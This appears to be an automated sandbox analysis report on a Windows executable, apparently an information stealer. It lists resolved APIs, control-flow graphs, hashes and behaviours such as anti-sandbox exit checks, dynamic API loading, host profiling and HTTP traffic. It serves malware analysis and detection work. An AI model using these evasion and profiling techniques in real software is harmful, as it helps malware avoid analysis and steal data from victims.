f651f4 27015->27016 27017 f87280 lstrcpy 27016->27017 27018 f651fd 27017->27018 27019 f87310 3 API calls 27018->27019 27020 f65213 27019->27020 27021 f87280 lstrcpy 27020->27021 27022 f6521c 27021->27022 27023 f87310 3 API calls 27022->27023 27024 f65231 27023->27024 27025 f87280 lstrcpy 27024->27025 27026 f6523a 27025->27026 27027 f872c0 2 API calls 27026->27027 27028 f6524d 27027->27028 27029 f87280 lstrcpy 27028->27029 27030 f65256 27029->27030 27031 f87310 3 API calls 27030->27031 27032 f6526b 27031->27032 27033 f87280 lstrcpy 27032->27033 27034 f65274 27033->27034 27035 f87310 3 API calls 27034->27035 27036 f65289 27035->27036 27037 f87280 lstrcpy 27036->27037 27038 f65292 27037->27038 27039 f872c0 2 API calls 27038->27039 27040 f652a5 27039->27040 27041 f87280 lstrcpy 27040->27041 27042 f652ae 27041->27042 27043 f87310 3 API calls 27042->27043 27044 f652c3 27043->27044 27045 f87280 lstrcpy 27044->27045 27046 f652cc 27045->27046 27047 f87310 3 API calls 27046->27047 27048 f652e2 27047->27048 27049 f87280 lstrcpy 27048->27049 27050 f652eb 27049->27050 27051 f87310 3 API calls 27050->27051 27052 f65301 27051->27052 27053 f87280 lstrcpy 27052->27053 27054 f6530a 27053->27054 27055 f87310 3 API calls 27054->27055 27056 f6531f 27055->27056 27057 f87280 lstrcpy 27056->27057 27058 f65328 27057->27058 27059 f872c0 2 API calls 27058->27059 27060 f6533b 27059->27060 27061 f87280 lstrcpy 27060->27061 27062 f65344 27061->27062 27063 f65370 lstrcpy 27062->27063 27064 f6537c 27062->27064 27063->27064 27065 f872c0 2 API calls 27064->27065 27066 f6538a 27065->27066 27067 f872c0 2 API calls 27066->27067 27068 f65397 27067->27068 27069 f87280 lstrcpy 27068->27069 27070 f653a1 27069->27070 27071 f653b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27070->27071 27072 f6549c InternetCloseHandle 27071->27072 27076 f653f2 27071->27076 27074 f654ae 27072->27074 27073 f653fd lstrlen 27073->27076 27074->27001 27075 f6542e lstrcpy lstrcat 27075->27076 27076->27072 27076->27073 27076->27075 27077 f65473 27076->27077 27078 f6546b lstrcpy 27076->27078 27079 f6547a InternetReadFile 27077->27079 27078->27077 27079->27072 27079->27076 27081 f78cc6 ExitProcess 27080->27081 27096 f78ccd 27080->27096 27082 f78ee2 27082->25971 27083 f78e56 StrCmpCA 27083->27096 27084 f78d30 lstrlen 27084->27096 27085 f78dbd StrCmpCA 27085->27096 27086 f78ddd StrCmpCA 27086->27096 27087 f78dfd StrCmpCA 27087->27096 27088 f78e1d StrCmpCA 27088->27096 27089 f78e3d StrCmpCA 27089->27096 27090 f78d5a lstrlen 27090->27096 27091 f78d06 lstrlen 27091->27096 27092 f78d84 StrCmpCA 27092->27096 27093 f78da4 StrCmpCA 27093->27096 27094 f78e6f StrCmpCA 27094->27096 27095 f78e88 lstrlen 27095->27096 27096->27082 27096->27083 27096->27084 27096->27085 27096->27086 27096->27087 27096->27088 27096->27089 27096->27090 27096->27091 27096->27092 27096->27093 27096->27094 27096->27095 27097 f78ebb lstrcpy 27096->27097 27097->27096 27098->25977 27099->25979 27100->25985 27101->25987 27102->25993 27103->25995 27104->26001 27105->26005 27106->26011 27107->26013 27108->26017 27109->26031 27110->26035 27111->26034 27112->26030 27113->26034 27114->26049 27115->26037 27116->26038 27117->26042 27118->26045 27119->26051 27120->26057 27121->26060 27122->26067 27123->26088 27124->26092 27125->26091 27126->26087 27127->26091 27128->26101 27131 f6161f 27130->27131 27132 f61633 27131->27132 27133 f6162b lstrcpy 27131->27133 27134 f6164d lstrcpy 27132->27134 27135 f61655 27132->27135 27133->27132 27134->27135 27136 f6166f lstrcpy 27135->27136 27137 f61677 27135->27137 27136->27137 27138 f61699 27137->27138 27139 f61691 lstrcpy 27137->27139 27138->26823 27139->27138 27141 f871e6 27140->27141 27142 f871fc lstrcpy 27141->27142 27143 f82860 27141->27143 27142->27143 27143->25966 27145 f64bd0 27144->27145 27145->27145 27146 f64bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27145->27146 27147 f64c41 27146->27147 27147->26931 27149 f83e83 27148->27149 27150 f83e9f lstrcpy 27149->27150 27151 f83eab 27149->27151 27150->27151 27152 f83ecd lstrcpy 27151->27152 27153 f83ed5 GetSystemTime 27151->27153 27152->27153 27154 f83ef3 27153->27154 27154->26949 27157 f8732d 27155->27157 27156 f6519b 27159 f87280 27156->27159 27157->27156 27158 f8733d lstrcpy lstrcat 27157->27158 27158->27156 27160 f8728c 27159->27160 27161 f872b4 27160->27161 27162 f872ac lstrcpy 27160->27162 27161->27006 27162->27161 27165 f872dc 27163->27165 27164 f651b7 27164->27009 27165->27164 27166 f872ed lstrcpy lstrcat 27165->27166 27166->27164 27189 f831f0 GetSystemInfo wsprintfA 27167 f7e0f9 140 API calls 27215 f76b79 138 API calls 27182 f68c79 strlen malloc strcpy_s 27198 f7f2f8 93 API calls 27206 f6bbf9 90 API calls 27216 f61b64 162 API calls 27217 f872f6 lstrcat strlen 27192 f82d60 11 API calls 27218 f82b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27219 f8a280 __CxxFrameHandler 27201 f71269 408 API calls 27183 f65869 57 API calls 27168 f82cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27184 f82853 lstrcpy 27190 f701d9 126 API calls 27194 f73959 244 API calls 27221 f78615 49 API calls 27169 f83cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27207 f833c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27208 f78615 48 API calls 27185 f7e049 147 API calls 27209 f7abb2 120 API calls 27196 f83130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27199 f616b9 200 API calls 27202 f6f639 144 API calls 27223 f6bf39 177 API calls 27170 f830a0 GetSystemPowerStatus 27191 f829a0 GetCurrentProcess IsWow64Process 27210 f723a9 298 API calls 27226 f74b29 303 API calls 27171 f8749e malloc strlen ctype 27187 f82c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27211 f78615 47 API calls 27173 f72499 290 API calls 27197 f84e35 9 API calls 27212 f6db99 673 API calls 27213 f8938d 9 API calls 4 library calls 27174 f82880 10 API calls 27175 f84480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 27176 f83480 6 API calls 27200 f83280 7 API calls 27177 f78c88 16 API calls 27227 f6b309 98 API calls

                                    Executed Functions

                                    Function 00F64C50 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F64C7F
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F64CD2
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F64D05
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F64D35
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F64D73
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F64DA6
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00F64DB6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$InternetOpen
                                    • String ID: "$------
                                    • API String ID: 2041821634-2370822465
                                    • Opcode ID: 104c45b9a70f82226ef81a936d507e3cc27994423a93c479b165b8222a4895ae
                                    • Instruction ID: 583cf0378385b84405fdd414d5b4022da2f7d1c7f213bac5f6d5f77471f391e7
                                    • Opcode Fuzzy Hash: 104c45b9a70f82226ef81a936d507e3cc27994423a93c479b165b8222a4895ae
                                    • Instruction Fuzzy Hash: 50527171D0161A9BDB21FFA4DC49B9E77B9AF44720F184028F915E7241DB78EC42ABE0
                                    Function 00F86390 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2125 f86390-f863bd GetPEB 2126 f865c3-f86623 LoadLibraryA * 5 2125->2126 2127 f863c3-f865be call f862f0 GetProcAddress * 20 2125->2127 2129 f86638-f8663f 2126->2129 2130 f86625-f86633 GetProcAddress 2126->2130 2127->2126 2132 f8666c-f86673 2129->2132 2133 f86641-f86667 GetProcAddress * 2 2129->2133 2130->2129 2134 f86688-f8668f 2132->2134 2135 f86675-f86683 GetProcAddress 2132->2135 2133->2132 2137 f86691-f8669f GetProcAddress 2134->2137 2138 f866a4-f866ab 2134->2138 2135->2134 2137->2138 2139 f866ad-f866d2 GetProcAddress * 2 2138->2139 2140 f866d7-f866da 2138->2140 2139->2140
                                    APIs
                                    • GetProcAddress.KERNEL32(74DD0000,00A92260), ref: 00F863E9
                                    • GetProcAddress.KERNEL32(74DD0000,00A922D8), ref: 00F86402
                                    • GetProcAddress.KERNEL32(74DD0000,00A92278), ref: 00F8641A
                                    • GetProcAddress.KERNEL32(74DD0000,00A92290), ref: 00F86432
                                    • GetProcAddress.KERNEL32(74DD0000,00A98F58), ref: 00F8644B
                                    • GetProcAddress.KERNEL32(74DD0000,00A85AB0), ref: 00F86463
                                    • GetProcAddress.KERNEL32(74DD0000,00A85DD0), ref: 00F8647B
                                    • GetProcAddress.KERNEL32(74DD0000,00A92410), ref: 00F86494
                                    • GetProcAddress.KERNEL32(74DD0000,00A924A0), ref: 00F864AC
                                    • GetProcAddress.KERNEL32(74DD0000,00A923B0), ref: 00F864C4
                                    • GetProcAddress.KERNEL32(74DD0000,00A922A8), ref: 00F864DD
                                    • GetProcAddress.KERNEL32(74DD0000,00A85CB0), ref: 00F864F5
                                    • GetProcAddress.KERNEL32(74DD0000,00A92350), ref: 00F8650D
                                    • GetProcAddress.KERNEL32(74DD0000,00A92440), ref: 00F86526
                                    • GetProcAddress.KERNEL32(74DD0000,00A85D10), ref: 00F8653E
                                    • GetProcAddress.KERNEL32(74DD0000,00A92458), ref: 00F86556
                                    • GetProcAddress.KERNEL32(74DD0000,00A923C8), ref: 00F8656F
                                    • GetProcAddress.KERNEL32(74DD0000,00A85C10), ref: 00F86587
                                    • GetProcAddress.KERNEL32(74DD0000,00A92320), ref: 00F8659F
                                    • GetProcAddress.KERNEL32(74DD0000,00A85D70), ref: 00F865B8
                                    • LoadLibraryA.KERNEL32(00A92380,?,?,?,00F81C03), ref: 00F865C9
                                    • LoadLibraryA.KERNEL32(00A92308,?,?,?,00F81C03), ref: 00F865DB
                                    • LoadLibraryA.KERNEL32(00A92338,?,?,?,00F81C03), ref: 00F865ED
                                    • LoadLibraryA.KERNEL32(00A92398,?,?,?,00F81C03), ref: 00F865FE
                                    • LoadLibraryA.KERNEL32(00A923E0,?,?,?,00F81C03), ref: 00F86610
                                    • GetProcAddress.KERNEL32(75A70000,00A923F8), ref: 00F8662D
                                    • GetProcAddress.KERNEL32(75290000,00A92428), ref: 00F86649
                                    • GetProcAddress.KERNEL32(75290000,00A92470), ref: 00F86661
                                    • GetProcAddress.KERNEL32(75BD0000,00A92488), ref: 00F8667D
                                    • GetProcAddress.KERNEL32(75450000,00A85CD0), ref: 00F86699
                                    • GetProcAddress.KERNEL32(76E90000,00A99088), ref: 00F866B5
                                    • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00F866CC
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 00F866C1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: ff4ad629c6439ec93026bf109723b5e7908317ea8012d881355db4743f156abd
                                    • Instruction ID: 5e385bc12d42f866f8f7f78884f602e519eca3557331449b7d9a1acd4a446a31
                                    • Opcode Fuzzy Hash: ff4ad629c6439ec93026bf109723b5e7908317ea8012d881355db4743f156abd
                                    • Instruction Fuzzy Hash: 6FA15DF5A152089FD77CDFA4E948A2637BDF789648308853DE936C3348E734A890DB60
                                    Function 00F81BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2141 f81bf0-f81c0b call f62a90 call f86390 2146 f81c1a-f81c27 call f62930 2141->2146 2147 f81c0d 2141->2147 2151 f81c29-f81c2f lstrcpy 2146->2151 2152 f81c35-f81c63 2146->2152 2148 f81c10-f81c18 2147->2148 2148->2146 2148->2148 2151->2152 2156 f81c6d-f81c7b GetSystemInfo 2152->2156 2157 f81c65-f81c67 ExitProcess 2152->2157 2158 f81c7d-f81c7f ExitProcess 2156->2158 2159 f81c85-f81ca0 call f61030 call f610c0 GetUserDefaultLangID 2156->2159 2164 f81cb8-f81cca call f82ad0 call f83e10 2159->2164 2165 f81ca2-f81ca9 2159->2165 2171 f81ccc-f81cde call f82a40 call f83e10 2164->2171 2172 f81ce7-f81d06 lstrlen call f62930 2164->2172 2165->2164 2166 f81cb0-f81cb2 ExitProcess 2165->2166 2171->2172 2185 f81ce0-f81ce1 ExitProcess 2171->2185 2177 f81d08-f81d0d 2172->2177 2178 f81d23-f81d40 lstrlen call f62930 2172->2178 2177->2178 2180 f81d0f-f81d11 2177->2180 2186 f81d5a-f81d7b call f82ad0 lstrlen call f62930 2178->2186 2187 f81d42-f81d44 2178->2187 2180->2178 2183 f81d13-f81d1d lstrcpy lstrcat 2180->2183 2183->2178 2193 f81d9a-f81db4 lstrlen call f62930 2186->2193 2194 f81d7d-f81d7f 2186->2194 2187->2186 2188 f81d46-f81d54 lstrcpy lstrcat 2187->2188 2188->2186 2199 f81dce-f81deb call f82a40 lstrlen call f62930 2193->2199 2200 f81db6-f81db8 2193->2200 2194->2193 2196 f81d81-f81d85 2194->2196 2196->2193 2198 f81d87-f81d94 lstrcpy lstrcat 2196->2198 2198->2193 2206 f81e0a-f81e0f 2199->2206 2207 f81ded-f81def 2199->2207 2200->2199 2201 f81dba-f81dc8 lstrcpy lstrcat 2200->2201 2201->2199 2209 f81e11 call f62a20 2206->2209 2210 f81e16-f81e22 call f62930 2206->2210 2207->2206 2208 f81df1-f81df5 2207->2208 2208->2206 2212 f81df7-f81e04 lstrcpy lstrcat 2208->2212 2209->2210 2215 f81e30-f81e66 call f62a20 * 5 OpenEventA 2210->2215 2216 f81e24-f81e26 2210->2216 2212->2206 2228 f81e68-f81e8a CloseHandle Sleep OpenEventA 2215->2228 2229 f81e8c-f81ea0 CreateEventA call f81b20 call f7ffd0 2215->2229 2216->2215 2217 f81e28-f81e2a lstrcpy 2216->2217 2217->2215 2228->2228 2228->2229 2233 f81ea5-f81eae CloseHandle ExitProcess 2229->2233
                                    APIs
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A92260), ref: 00F863E9
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A922D8), ref: 00F86402
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A92278), ref: 00F8641A
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A92290), ref: 00F86432
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A98F58), ref: 00F8644B
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A85AB0), ref: 00F86463
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A85DD0), ref: 00F8647B
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A92410), ref: 00F86494
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A924A0), ref: 00F864AC
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A923B0), ref: 00F864C4
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A922A8), ref: 00F864DD
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A85CB0), ref: 00F864F5
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A92350), ref: 00F8650D
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F81C2F
                                    • ExitProcess.KERNEL32 ref: 00F81C67
                                    • GetSystemInfo.KERNEL32(?), ref: 00F81C71
                                    • ExitProcess.KERNEL32 ref: 00F81C7F
                                      • Part of subcall function 00F61030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00F61046
                                      • Part of subcall function 00F61030: VirtualAllocExNuma.KERNEL32(00000000), ref: 00F6104D
                                      • Part of subcall function 00F61030: ExitProcess.KERNEL32 ref: 00F61058
                                      • Part of subcall function 00F610C0: GlobalMemoryStatusEx.KERNEL32 ref: 00F610EA
                                      • Part of subcall function 00F610C0: ExitProcess.KERNEL32 ref: 00F61114
                                    • GetUserDefaultLangID.KERNEL32 ref: 00F81C8F
                                    • ExitProcess.KERNEL32 ref: 00F81CB2
                                    • ExitProcess.KERNEL32 ref: 00F81CE1
                                    • lstrlen.KERNEL32(00A99048), ref: 00F81CEE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F81D15
                                    • lstrcat.KERNEL32(00000000,00A99048), ref: 00F81D1D
                                    • lstrlen.KERNEL32(00F94B98), ref: 00F81D28
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F81D48
                                    • lstrcat.KERNEL32(00000000,00F94B98), ref: 00F81D54
                                    • lstrlen.KERNEL32(00000000), ref: 00F81D63
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F81D89
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F81D94
                                    • lstrlen.KERNEL32(00F94B98), ref: 00F81D9F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F81DBC
                                    • lstrcat.KERNEL32(00000000,00F94B98), ref: 00F81DC8
                                    • lstrlen.KERNEL32(00000000), ref: 00F81DD7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F81DF9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F81E04
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                    • String ID:
                                    • API String ID: 3366406952-0
                                    • Opcode ID: b03efd1291fe26f96558c89239b6e19eebd4c36947c02510c478b573c0b8e873
                                    • Instruction ID: 70b811b57691cb4098abbc6e63d831135e7bf304dfa1d4be7a41504e9dfde6ba
                                    • Opcode Fuzzy Hash: b03efd1291fe26f96558c89239b6e19eebd4c36947c02510c478b573c0b8e873
                                    • Instruction Fuzzy Hash: 7371C231900209ABDB34BBB0DC8DBAE36BDBF45715F040138F936D6145DB78A842EB61
                                    Function 00F64A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2850 f64a60-f64afc RtlAllocateHeap 2867 f64afe-f64b03 2850->2867 2868 f64b7a-f64bbe VirtualProtect 2850->2868 2869 f64b06-f64b78 2867->2869 2869->2868
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F64AA2
                                    • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00F64BB0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-3329630956
                                    • Opcode ID: 7177083bf889d875332c8e53c2eeb656e99e10c8cc5ac80cab5a59692fdfd053
                                    • Instruction ID: 741e6bda379cda2b38fa7d3ac181d28597d75258588966ae0bf5c6a1acbaca4d
                                    • Opcode Fuzzy Hash: 7177083bf889d875332c8e53c2eeb656e99e10c8cc5ac80cab5a59692fdfd053
                                    • Instruction Fuzzy Hash: 0C31D819F8022D76AB22EBEF6CC7F5F6E55FF95B60B014056740857180C9A1F502EAE3
                                    Function 00F82AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2957 f82ad0-f82b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 f82b44-f82b59 2957->2958 2959 f82b24-f82b36 2957->2959
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00F82AFF
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F82B06
                                    • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00F82B1A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
